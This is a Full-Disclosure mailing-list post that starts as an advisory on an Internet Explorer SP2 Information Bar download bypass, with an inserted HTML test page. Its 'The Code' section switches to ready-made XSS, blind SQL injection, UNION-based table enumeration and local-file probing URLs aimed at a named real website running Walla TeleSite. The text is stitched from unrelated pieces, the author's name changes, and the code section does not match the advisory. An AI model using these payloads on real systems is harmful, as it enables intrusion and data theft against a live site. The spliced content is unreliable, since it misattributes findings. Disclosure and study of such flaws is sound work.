
[Full-disclosure] bug



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:       Internet Explorer
Vendors:           http://www.microsoft.com
Versions:          6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With:      SP2;
Platforms:         Windows
Bug:               Remote File Download Information Bar Bypass
Exploitation:      Remote with browser
Date:              13 Jan 2005
Author:            Rafel Ivgi, The-Insider
e-mail:            the_insider@xxxxxxxx
web:               http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the world.
Windows XP Service Pack 2 was designed to block any automatic file download:
the download is held back behind the Information Bar, which the user must
click and then select "Download File" before the file is fetched.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

When a page tries to make Internet Explorer download a file, the user gets
the Information Bar. The Information Bar mechanism blocks/catches all
references to downloadable files, even those triggered through JavaScript
and HTML event properties.
However, Internet Explorer on SP2 DOES NOT CATCH a "body" tag whose HTML
"onclick" event dynamically creates an "iframe" tag. For a more involved,
dynamic object creation I used the "createElement" function.
This way an attacker can make a user download a file just by clicking
anywhere on the page (not on a hyperlink); the click itself is still
required, but no link or button needs to be pressed.
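As an added illustration of the behaviour described above, and not the author's own proof of concept (which this page does not reproduce): a test page whose body "onclick" handler creates an iframe with createElement at run time and points it at a downloadable file. The server name and file name are placeholders, and a test server that serves the file as an attachment is assumed. A control button that navigates to the same URL directly, the path the advisory says the Information Bar does catch, is included for comparison.

```html
<!-- Added example, not from the advisory. Server and file name are placeholders. -->
<html>
<head>
<title>Information Bar test page</title>
<script type="text/javascript">
  // Hypothetical download target (assumed: served with
  // Content-Disposition: attachment so that IE treats it as a file download).
  var fileUrl = "http://test-server.example/download/test.exe";

  // The path the advisory says is NOT caught by the Information Bar:
  // a click anywhere on the document body creates an iframe element
  // dynamically and sets its src to the file. No hyperlink is involved.
  function createDownloadFrame() {
    var frame = document.createElement("iframe");
    frame.src = fileUrl;
    frame.width = "0";
    frame.height = "0";
    document.body.appendChild(frame);
  }

  // Control case: a script-driven navigation to the same file, which the
  // advisory says IS caught. Bubbling is stopped so the body handler above
  // does not also fire for this click (IE6-era event model).
  function directNavigate(e) {
    e = e || window.event;
    e.cancelBubble = true;
    if (e.stopPropagation) {
      e.stopPropagation();
    }
    window.location.href = fileUrl;
  }
</script>
</head>
<body onclick="createDownloadFrame()">
  <p>Click anywhere on this page (outside the button) to trigger the
     dynamically created iframe.</p>
  <p>
    <button onclick="directNavigate(event)">Control: direct navigation</button>
  </p>
</body>
</html>
```

Load the page in the affected IE build, click the blank area, and check whether the file download dialog appears without the Information Bar; then press the control button and confirm that the same file is held back by the bar.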

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

The following findings are in the Walla TeleSite system hosted at
www2.golan.org.il (the TeleSite name also appears in the disclosed local path
below).

Articles Menu Access:
-----------------------------------------
        http://www2.golan.org.il/ts.exe?tsurl=0.1.0.0


Cross Site Scripting - XSS:
--------------------------
        The sug (search term) parameter is reflected into the search_tour
        template without output encoding. %EE%EC%E5%EF is a Hebrew search
        term in Windows-1255 encoding; it is followed by a single quote and
        the script tag:

http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EE%EC%E5%EF'%20<script>alert()</script>


Blind SQL Injection
-------------------
        Proof Of Concept (boolean test: the single quote closes the string
        literal in the backend query, and the page content changes when the
        appended condition '1'='2' is false):

http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EE%EC%E5%EF'%20and%20'1'='2

        Exploitation (UNION-based, since query results are echoed in the
        page; the TOP syntax together with information_schema.columns is
        consistent with a Microsoft SQL Server backend). The first request
        probes the column count of the original SELECT with 23 NULLs; the
        second substitutes table_name into the tenth column position; the
        last two replace the NULLs in positions 10 to 23 with marker
        strings to see which positions are rendered by the template:

http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EE%EC%E5%EF'%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20information_schema.columns--

http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%EE%EC%E5%EF'%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,table_name,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20information_schema.columns--

http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe','asd','asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--

http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe','asd','asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--


Local Path Disclosure:
-----------------------
        D:\TeleSite\online\templates\\example\sections\header


Local File Enumeration:
-----------------------
        Compare the response for a file that exists on the server
        (c:\boot.ini) with one that does not (c:\boot1.ini); the difference
        reveals whether an arbitrary local path exists.

        http://www2.golan.org.il/ts.cgi?c:\boot.ini
        http://www2.golan.org.il/ts.cgi?c:\boot1.ini


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafi Nahum, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

walla telesite system vulnerabilities:
****************************************


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/